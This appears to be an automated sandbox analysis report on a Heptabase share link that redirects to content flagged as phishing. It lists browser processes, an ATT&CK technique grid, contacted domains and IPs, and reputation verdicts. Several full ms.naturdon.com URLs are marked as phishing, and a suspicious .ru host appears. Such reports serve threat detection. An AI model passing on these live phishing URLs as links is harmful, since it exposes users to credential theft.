              Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" "https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da7"
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-pre-read-main-dll --field-trial-handle=1984,i,8051527031639735662,391681969348511936,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction --variations-seed-version --mojo-platform-channel-handle=2192 /prefetch:3
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknown
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Program Files\Google\Chrome\Application\chrome.exeDirectory created: C:\Program Files\Google\Chrome\Application\Dictionaries

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: 2.19.d.script.csv, type: HTML
              Source: Yara matchFile source: 3.30..script.csv, type: HTML
              Source: Yara matchFile source: 3.31..script.csv, type: HTML
              Source: Yara matchFile source: 3.9.pages.csv, type: HTML
              Source: Yara matchFile source: 3.8.pages.csv, type: HTML
              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity Information1
              Scripting
              Valid AccountsWindows Management Instrumentation2
              Browser Extensions
              1
              Process Injection
              12
              Masquerading
              OS Credential DumpingSystem Service DiscoveryRemote ServicesData from Local System1
              Encrypted Channel
              Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/Job1
              Scripting
              1
              Extra Window Memory Injection
              1
              Process Injection
              LSASS MemoryApplication Window DiscoveryRemote Desktop ProtocolData from Removable Media4
              Non-Application Layer Protocol
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)Logon Script (Windows)1
              Deobfuscate/Decode Files or Information
              Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared Drive5
              Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook1
              File Deletion
              NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput Capture3
              Ingress Tool Transfer
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Extra Window Memory Injection
              LSA SecretsInternet Connection DiscoverySSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              https://app.heptabase.com/w/9572b61a878f03208943512867a816847d4d23b4f7ccb0a7fe97bab5d1ad7da70%Avira URL Cloudsafe
              No Antivirus matches
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              https://app.heptabase.com/assets/spark-md5-9953c3d1.js0%Avira URL Cloudsafe
              https://app.heptabase.com/assets/_commonjs-dynamic-modules-5cb9de4b.js0%Avira URL Cloudsafe
              https://app.heptabase.com/assets/main-4c0c8700.js0%Avira URL Cloudsafe
              https://app.heptabase.com/assets/index-18bd8637.css0%Avira URL Cloudsafe
              https://app.heptabase.com/assets/accountApi-ff2af548.css0%Avira URL Cloudsafe
              https://app.heptabase.com/assets/accountApi-672c2e6f.js0%Avira URL Cloudsafe
              https://get.heptabase.com/pr/js0%Avira URL Cloudsafe
              https://grsm.io/pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR0%Avira URL Cloudsafe
              https://get.heptabase.com/pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR0%Avira URL Cloudsafe
              https://partnerlinks.io/pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XR0%Avira URL Cloudsafe
              https://app.heptabase.com/manifest.json0%Avira URL Cloudsafe
              https://app.heptabase.com/assets/index-06eeb664.js0%Avira URL Cloudsafe
              https://o1198943.ingest.sentry.io/api/6321418/envelope/?sentry_key=00289ace08a54d5fb367f421faa5b69f&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.92.00%Avira URL Cloudsafe
              https://app.heptabase.com/assets/Inter-Medium-1b498b95.woff2?v=3.190%Avira URL Cloudsafe
              https://featureassets.org/v1/initialize?k=client-WK8FtmPcKpSwtJFDAGDoSxUZv0taT4llcvCeu4HtLYj&st=javascript-client&sv=3.0.0&t=1742837083421&sid=05aa3207-8879-4b64-9aa4-fbd6751adab2&se=10%Avira URL Cloudsafe
              https://app.heptabase.com/assets/index-e57bd1fd.js0%Avira URL Cloudsafe
              https://widget.intercom.io/widget/nc7yq1pg0%Avira URL Cloudsafe
              https://app.heptabase.com/assets/GuestPage-39686c92.js0%Avira URL Cloudsafe
              https://prodregistryv2.org/v1/rgstr?k=client-WK8FtmPcKpSwtJFDAGDoSxUZv0taT4llcvCeu4HtLYj&st=javascript-client&sv=3.0.0&t=1742837093422&sid=05aa3207-8879-4b64-9aa4-fbd6751adab2&ec=10%Avira URL Cloudsafe
              https://js.intercomcdn.com/frame-modern.24099529.js0%Avira URL Cloudsafe
              https://prodregistryv2.org/v1/rgstr?k=client-WK8FtmPcKpSwtJFDAGDoSxUZv0taT4llcvCeu4HtLYj&st=javascript-client&sv=3.0.0&t=1742837094249&sid=05aa3207-8879-4b64-9aa4-fbd6751adab2&ec=10%Avira URL Cloudsafe
              https://ms.naturdon.com/rqS5DHMtUFf3KT9q8ukN4yHulJtYoxvAk1NDcbB3pNrzjy100%Avira URL Cloudphishing
              https://ms.naturdon.com/opSQsIIfCrYEifeBNcpBzLABefvLCJwGmOyMuRzcmBuX45133100%Avira URL Cloudphishing
              https://ms.naturdon.com/efGejjtuNnmhRtNkGlHs8IHE7ijpHoVGG7mAI92qSys9uQiaNo78150100%Avira URL Cloudphishing
              https://ms.naturdon.com/stjXGvT17JklTv4LfDUGVIPdaYnFaQdUW4jCMkD3HbMhZoqA0Z67SnPrMnOwyyOYBACmgPHP6wGVVWZbZOviWBaoaGgh254100%Avira URL Cloudphishing
              https://ms.naturdon.com/ghN0n6xyqF79DUkCI7M5jl9tDKtEGk7pgxypCNYtBFhWI8elPUjiKnPef204100%Avira URL Cloudphishing
              https://ms.naturdon.com/wxE3arEkk2RbNb59NyJropvgEEl7AIwr34125100%Avira URL Cloudphishing
              https://ms.naturdon.com/GDSherpa-regular.woff100%Avira URL Cloudphishing
              https://ms.naturdon.com/ijDh3NnwhFxGLRV4LwW2300gHnRdqrb51FENUw7805QPX1NNab230100%Avira URL Cloudphishing
              https://ms.naturdon.com/kleRO9JVys2NlTKKYiRt12w9NfiqKjLiiBbqOE07EDpVPCYTbXYoOXDS2ZtRvcD9w4YjWzcKTWa9tmSgbDuolYpqsXv8GNph76iirb3Gh5eLR6hFTzubcQLg5pdZAdNeB8tRVtUFZIBB7Uj497bIA4m2QpRzW8rW7SPyz660100%Avira URL Cloudphishing
              https://ms.naturdon.com/xynACghvrsuVjigh30100%Avira URL Cloudphishing
              NameIPActiveMaliciousAntivirus DetectionReputation
              o1198943.ingest.sentry.io
              34.120.195.249
              truefalse
                unknown
                a.nel.cloudflare.com
                35.190.80.1
                truefalse
                  high
                  widget.intercom.io
                  13.249.91.19
                  truefalse
                    high
                    github.com
                    140.82.114.3
                    truefalse
                      high
                      ms.naturdon.com
                      172.67.195.46
                      truetrue
                        unknown
                        heptabase-alb-bluegreen-118363383.us-west-1.elb.amazonaws.com
                        184.72.12.70
                        truefalse
                          unknown
                          s3-r-w.us-west-1.amazonaws.com
                          52.219.120.97
                          truefalse
                            unknown
                            featureassets.org
                            34.128.128.0
                            truefalse
                              high
                              dvw4e.ajcffp.ru
                              104.21.92.165
                              truefalse
                                unknown
                                partnerlinks.io
                                104.18.31.133
                                truefalse
                                  high
                                  d296je7bbdd650.cloudfront.net
                                  13.249.86.140
                                  truefalse
                                    high
                                    code.jquery.com
                                    151.101.130.137
                                    truefalse
                                      high
                                      prodregistryv2.org
                                      34.128.128.0
                                      truefalse
                                        high
                                        cdnjs.cloudflare.com
                                        104.17.24.14
                                        truefalse
                                          high
                                          d-b0q5nnqaml.execute-api.us-west-1.amazonaws.com
                                          13.56.83.2
                                          truefalse
                                            unknown
                                            www.google.com
                                            142.250.65.164
                                            truefalse
                                              high
                                              d19d360lklgih4.cloudfront.net
                                              18.164.124.11
                                              truefalse
                                                high
                                                objects.githubusercontent.com
                                                185.199.111.133
                                                truefalse
                                                  high
                                                  grsm.io
                                                  104.18.10.212
                                                  truefalse
                                                    high
                                                    js.intercomcdn.com
                                                    108.139.47.46
                                                    truefalse
                                                      high
                                                      cdn.segment.com
                                                      unknown
                                                      unknownfalse
                                                        high
                                                        ok4static.oktacdn.com
                                                        unknown
                                                        unknownfalse
                                                          high
                                                          app.heptabase.com
                                                          unknown
                                                          unknownfalse
                                                            unknown
                                                            get.heptabase.com
                                                            unknown
                                                            unknownfalse
                                                              unknown
                                                              api.heptabase.com
                                                              unknown
                                                              unknownfalse
                                                                unknown
                                                                heptabase-hepta-file.s3.us-west-1.amazonaws.com
                                                                unknown
                                                                unknownfalse
                                                                  unknown
                                                                  NameMaliciousAntivirus DetectionReputation
                                                                  https://otelrules.svc.static.microsoft/rules/rule701151v1s19.xmlfalse
                                                                    high
                                                                    https://otelrules.svc.static.microsoft/rules/rule704001v0s19.xmlfalse
                                                                      high
                                                                      https://ok4static.oktacdn.com/fs/bcg/4/gfsh9pi7jcWKJKMAs1t7false
                                                                        high
                                                                        https://otelrules.svc.static.microsoft/rules/rule702151v1s19.xmlfalse
                                                                          high
                                                                          https://otelrules.svc.static.microsoft/rules/rule700151v1s19.xmlfalse
                                                                            high
                                                                            https://otelrules.svc.static.microsoft/rules/rule703151v1s19.xmlfalse
                                                                              high
                                                                              https://ms.naturdon.com/efGejjtuNnmhRtNkGlHs8IHE7ijpHoVGG7mAI92qSys9uQiaNo78150true
                                                                              • Avira URL Cloud: phishing
                                                                              unknown
                                                                              https://otelrules.svc.static.microsoft/rules/rule120630v0s19.xmlfalse
                                                                                high
                                                                                https://otelrules.svc.static.microsoft/rules/rule120645v0s19.xmlfalse
                                                                                  high
                                                                                  https://app.heptabase.com/assets/index-06eeb664.jsfalse
                                                                                  • Avira URL Cloud: safe
                                                                                  unknown
                                                                                  https://otelrules.svc.static.microsoft/rules/rule700001v2s19.xmlfalse
                                                                                    high
                                                                                    https://app.heptabase.com/manifest.jsonfalse
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://featureassets.org/v1/initialize?k=client-WK8FtmPcKpSwtJFDAGDoSxUZv0taT4llcvCeu4HtLYj&st=javascript-client&sv=3.0.0&t=1742837083421&sid=05aa3207-8879-4b64-9aa4-fbd6751adab2&se=1false
                                                                                    • Avira URL Cloud: safe
                                                                                    unknown
                                                                                    https://otelrules.svc.static.microsoft/rules/rule701751v1s19.xmlfalse
                                                                                      high
                                                                                      https://otelrules.svc.static.microsoft/rules/rule120663v0s19.xmlfalse
                                                                                        high
                                                                                        https://otelrules.svc.static.microsoft/rules/rule701301v1s19.xmlfalse
                                                                                          high
                                                                                          https://otelrules.svc.static.microsoft/rules/rule702751v1s19.xmlfalse
                                                                                            high
                                                                                            https://otelrules.svc.static.microsoft/rules/rule702301v1s19.xmlfalse
                                                                                              high
                                                                                              https://grsm.io/pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XRfalse
                                                                                              • Avira URL Cloud: safe
                                                                                              unknown
                                                                                              https://ms.naturdon.com/rqS5DHMtUFf3KT9q8ukN4yHulJtYoxvAk1NDcbB3pNrzjytrue
                                                                                              • Avira URL Cloud: phishing
                                                                                              unknown
                                                                                              https://otelrules.svc.static.microsoft/rules/rule120609v0s19.xmlfalse
                                                                                                high
                                                                                                https://app.heptabase.com/assets/accountApi-672c2e6f.jsfalse
                                                                                                • Avira URL Cloud: safe
                                                                                                unknown
                                                                                                https://otelrules.svc.static.microsoft/rules/rule120627v0s19.xmlfalse
                                                                                                  high
                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703601v0s19.xmlfalse
                                                                                                    high
                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700751v1s19.xmlfalse
                                                                                                      high
                                                                                                      https://otelrules.svc.static.microsoft/rules/rule700301v1s19.xmlfalse
                                                                                                        high
                                                                                                        https://otelrules.svc.static.microsoft/rules/rule701550v1s19.xmlfalse
                                                                                                          high
                                                                                                          https://otelrules.svc.static.microsoft/rules/rule700100v1s19.xmlfalse
                                                                                                            high
                                                                                                            https://ms.naturdon.com/GDSherpa-regular.wofftrue
                                                                                                            • Avira URL Cloud: phishing
                                                                                                            unknown
                                                                                                            https://ok4static.oktacdn.com/assets/loginpage/css/loginpage-theme.e0d37a504604ef874bad26435d62011f.cssfalse
                                                                                                              high
                                                                                                              https://otelrules.svc.static.microsoft/rules/rule702550v1s19.xmlfalse
                                                                                                                high
                                                                                                                https://otelrules.svc.static.microsoft/rules/rule700550v1s19.xmlfalse
                                                                                                                  high
                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule703400v0s19.xmlfalse
                                                                                                                    high
                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule700901v1s19.xmlfalse
                                                                                                                      high
                                                                                                                      https://app.heptabase.com/assets/Inter-Medium-1b498b95.woff2?v=3.19false
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://widget.intercom.io/widget/nc7yq1pgfalse
                                                                                                                      • Avira URL Cloud: safe
                                                                                                                      unknown
                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule701100v1s19.xmlfalse
                                                                                                                        high
                                                                                                                        https://ms.naturdon.com/kleRO9JVys2NlTKKYiRt12w9NfiqKjLiiBbqOE07EDpVPCYTbXYoOXDS2ZtRvcD9w4YjWzcKTWa9tmSgbDuolYpqsXv8GNph76iirb3Gh5eLR6hFTzubcQLg5pdZAdNeB8tRVtUFZIBB7Uj497bIA4m2QpRzW8rW7SPyz660true
                                                                                                                        • Avira URL Cloud: phishing
                                                                                                                        unknown
                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700400v2s19.xmlfalse
                                                                                                                          high
                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701901v1s19.xmlfalse
                                                                                                                            high
                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120635v0s19.xmlfalse
                                                                                                                              high
                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule703850v0s19.xmlfalse
                                                                                                                                high
                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702901v1s19.xmlfalse
                                                                                                                                  high
                                                                                                                                  https://o1198943.ingest.sentry.io/api/6321418/envelope/?sentry_key=00289ace08a54d5fb367f421faa5b69f&sentry_version=7&sentry_client=sentry.javascript.browser%2F7.92.0false
                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                  unknown
                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120612v0s19.xmlfalse
                                                                                                                                    high
                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule703000v1s19.xmlfalse
                                                                                                                                      high
                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120681v0s19.xmlfalse
                                                                                                                                        high
                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule120640v0s19.xmlfalse
                                                                                                                                          high
                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule703450v1s19.xmlfalse
                                                                                                                                            high
                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule700700v1s19.xmlfalse
                                                                                                                                              high
                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule702000v1s19.xmlfalse
                                                                                                                                                high
                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule702450v1s19.xmlfalse
                                                                                                                                                  high
                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120617v0s19.xmlfalse
                                                                                                                                                    high
                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule703750v0s19.xmlfalse
                                                                                                                                                      high
                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703300v0s19.xmlfalse
                                                                                                                                                        high
                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700450v1s19.xmlfalse
                                                                                                                                                          high
                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule701700v1s19.xmlfalse
                                                                                                                                                            high
                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702700v1s19.xmlfalse
                                                                                                                                                              high
                                                                                                                                                              https://ms.naturdon.com/stjXGvT17JklTv4LfDUGVIPdaYnFaQdUW4jCMkD3HbMhZoqA0Z67SnPrMnOwyyOYBACmgPHP6wGVVWZbZOviWBaoaGgh254true
                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                              unknown
                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule700851v1s19.xmlfalse
                                                                                                                                                                high
                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703701v0s19.xmlfalse
                                                                                                                                                                  high
                                                                                                                                                                  https://ms.naturdon.com/opSQsIIfCrYEifeBNcpBzLABefvLCJwGmOyMuRzcmBuX45133true
                                                                                                                                                                  • Avira URL Cloud: phishing
                                                                                                                                                                  unknown
                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule701851v1s19.xmlfalse
                                                                                                                                                                    high
                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule702851v1s19.xmlfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule120619v0s19.xmlfalse
                                                                                                                                                                        high
                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule700600v1s19.xmlfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://partnerlinks.io/pr/grc/pk_gMoo12CUQTlAXRXiVjzxG5xoLjYpi7XRfalse
                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                          unknown
                                                                                                                                                                          https://cdnjs.cloudflare.com/ajax/libs/crypto-js/4.1.1/crypto-js.min.jsfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120625v0s19.xmlfalse
                                                                                                                                                                              high
                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120622v0s19.xmlfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule120653v0s19.xmlfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702600v1s19.xmlfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://app.heptabase.com/assets/GuestPage-39686c92.jsfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://js.intercomcdn.com/frame-modern.24099529.jsfalse
                                                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                                                    unknown
                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120647v0s19.xmlfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule224900v0s19.xmlfalse
                                                                                                                                                                                        high
                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703100v1s19.xmlfalse
                                                                                                                                                                                          high
                                                                                                                                                                                          https://app.heptabase.com/assets/accountApi-ff2af548.cssfalse
                                                                                                                                                                                          • Avira URL Cloud: safe
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://ms.naturdon.com/ghN0n6xyqF79DUkCI7M5jl9tDKtEGk7pgxypCNYtBFhWI8elPUjiKnPef204true
                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                          unknown
                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120668v0s19.xmlfalse
                                                                                                                                                                                            high
                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule702100v1s19.xmlfalse
                                                                                                                                                                                              high
                                                                                                                                                                                              https://ms.naturdon.com/wxE3arEkk2RbNb59NyJropvgEEl7AIwr34125true
                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://ms.naturdon.com/ijDh3NnwhFxGLRV4LwW2300gHnRdqrb51FENUw7805QPX1NNab230true
                                                                                                                                                                                              • Avira URL Cloud: phishing
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://prodregistryv2.org/v1/rgstr?k=client-WK8FtmPcKpSwtJFDAGDoSxUZv0taT4llcvCeu4HtLYj&st=javascript-client&sv=3.0.0&t=1742837093422&sid=05aa3207-8879-4b64-9aa4-fbd6751adab2&ec=1false
                                                                                                                                                                                              • Avira URL Cloud: safe
                                                                                                                                                                                              unknown
                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120620v0s19.xmlfalse
                                                                                                                                                                                                high
                                                                                                                                                                                                https://app.heptabase.com/assets/index-e57bd1fd.jsfalse
                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                unknown
                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/rule703351v0s19.xmlfalse
                                                                                                                                                                                                  high
                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule120128v0s19.xmlfalse
                                                                                                                                                                                                    high
                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120650v0s19.xmlfalse
                                                                                                                                                                                                      high
                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule703551v0s19.xmlfalse
                                                                                                                                                                                                        high
                                                                                                                                                                                                        https://otelrules.svc.static.microsoft/rules/rule703051v3s19.xmlfalse
                                                                                                                                                                                                          high
                                                                                                                                                                                                          https://ms.naturdon.com/xynACghvrsuVjigh30true
                                                                                                                                                                                                          • Avira URL Cloud: phishing
                                                                                                                                                                                                          unknown
                                                                                                                                                                                                          https://otelrules.svc.static.microsoft/rules/rule120661v0s19.xmlfalse
                                                                                                                                                                                                            high
                                                                                                                                                                                                            https://otelrules.svc.static.microsoft/rules/rule120655v0s19.xmlfalse
                                                                                                                                                                                                              high
                                                                                                                                                                                                              https://otelrules.svc.static.microsoft/rules/rule120614v0s19.xmlfalse
                                                                                                                                                                                                                high
                                                                                                                                                                                                                https://prodregistryv2.org/v1/rgstr?k=client-WK8FtmPcKpSwtJFDAGDoSxUZv0taT4llcvCeu4HtLYj&st=javascript-client&sv=3.0.0&t=1742837094249&sid=05aa3207-8879-4b64-9aa4-fbd6751adab2&ec=1false
                                                                                                                                                                                                                • Avira URL Cloud: safe
                                                                                                                                                                                                                unknown
                                                                                                                                                                                                                https://otelrules.svc.static.microsoft/rules/other-Win32-v19.bundlefalse
                                                                                                                                                                                                                  high
                                                                                                                                                                                                                  https://otelrules.svc.static.microsoft/rules/rule702350v1s19.xmlfalse
                                                                                                                                                                                                                    high
                                                                                                                                                                                                                    https://otelrules.svc.static.microsoft/rules/rule120639v0s19.xmlfalse
                                                                                                                                                                                                                      high
                                                                                                                                                                                                                      https://otelrules.svc.static.microsoft/rules/rule701050v1s19.xmlfalse
                                                                                                                                                                                                                        high
                                                                                                                                                                                                                        • No. of IPs < 25%
                                                                                                                                                                                                                        • 25% < No. of IPs < 50%
                                                                                                                                                                                                                        • 50% < No. of IPs < 75%
                                                                                                                                                                                                                        • 75% < No. of IPs
                                                                                                                                                                                                                        IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                                                        140.82.114.3
                                                                                                                                                                                                                        github.comUnited States
                                                                                                                                                                                                                        36459GITHUBUSfalse
                                                                                                                                                                                                                        16.15.4.12
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        unknownunknownfalse
                                                                                                                                                                                                                        172.67.195.46
                                                                                                                                                                                                                        ms.naturdon.comUnited States
                                                                                                                                                                                                                        13335CLOUDFLARENETUStrue
                                                                                                                                                                                                                        184.72.12.70
                                                                                                                                                                                                                        heptabase-alb-bluegreen-118363383.us-west-1.elb.amazonaws.comUnited States
                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                        108.139.47.46
                                                                                                                                                                                                                        js.intercomcdn.comUnited States
                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                        104.21.92.165
                                                                                                                                                                                                                        dvw4e.ajcffp.ruUnited States
                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        13.249.86.140
                                                                                                                                                                                                                        d296je7bbdd650.cloudfront.netUnited States
                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                        185.199.111.133
                                                                                                                                                                                                                        objects.githubusercontent.comNetherlands
                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                        151.101.130.137
                                                                                                                                                                                                                        code.jquery.comUnited States
                                                                                                                                                                                                                        54113FASTLYUSfalse
                                                                                                                                                                                                                        52.219.120.97
                                                                                                                                                                                                                        s3-r-w.us-west-1.amazonaws.comUnited States
                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                        142.251.40.131
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        142.251.41.14
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        142.251.16.84
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        18.164.124.11
                                                                                                                                                                                                                        d19d360lklgih4.cloudfront.netUnited States
                                                                                                                                                                                                                        3MIT-GATEWAYSUSfalse
                                                                                                                                                                                                                        35.190.80.1
                                                                                                                                                                                                                        a.nel.cloudflare.comUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        104.17.24.14
                                                                                                                                                                                                                        cdnjs.cloudflare.comUnited States
                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        13.249.91.19
                                                                                                                                                                                                                        widget.intercom.ioUnited States
                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                        1.1.1.1
                                                                                                                                                                                                                        unknownAustralia
                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        142.250.65.174
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        104.18.10.212
                                                                                                                                                                                                                        grsm.ioUnited States
                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        104.18.30.133
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        13335CLOUDFLARENETUSfalse
                                                                                                                                                                                                                        142.251.40.234
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        142.250.81.227
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        34.128.128.0
                                                                                                                                                                                                                        featureassets.orgUnited States
                                                                                                                                                                                                                        2686ATGS-MMD-ASUSfalse
                                                                                                                                                                                                                        142.250.81.234
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        13.56.83.2
                                                                                                                                                                                                                        d-b0q5nnqaml.execute-api.us-west-1.amazonaws.comUnited States
                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                        172.217.165.142
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        142.250.65.164
                                                                                                                                                                                                                        www.google.comUnited States
                                                                                                                                                                                                                        15169GOOGLEUSfalse
                                                                                                                                                                                                                        54.67.25.91
                                                                                                                                                                                                                        unknownUnited States
                                                                                                                                                                                                                        16509AMAZON-02USfalse
                                                                                                                                                                                                                        104.18.31.133
                                                                                                                                                                                                                        partnerlinks.ioUnited States
